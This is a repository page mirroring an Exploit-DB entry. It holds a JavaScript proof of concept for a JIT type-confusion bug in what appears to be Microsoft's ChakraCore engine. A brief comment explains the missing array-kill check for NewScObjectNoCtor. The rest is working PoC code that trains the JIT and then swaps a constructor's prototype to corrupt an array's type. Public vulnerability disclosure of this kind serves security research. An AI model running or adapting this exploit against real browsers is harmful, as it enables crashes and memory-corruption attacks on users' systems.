bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/44080.js
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
691 B
JavaScript
Raw Blame History

/*
This is similar to the previous issues 1457, 1459 (MSRC 42551, MSRC 42552).
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.
PoC:
*/
function inlinee() {
}
function opt(arr) {
arr[0] = 1.1;
new inlinee();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
inlinee.prototype = {};
opt(arr);
}
inlinee.prototype = arr;
opt(arr);
print(arr);
}
main();
Reference in a new issue View git blame Copy permalink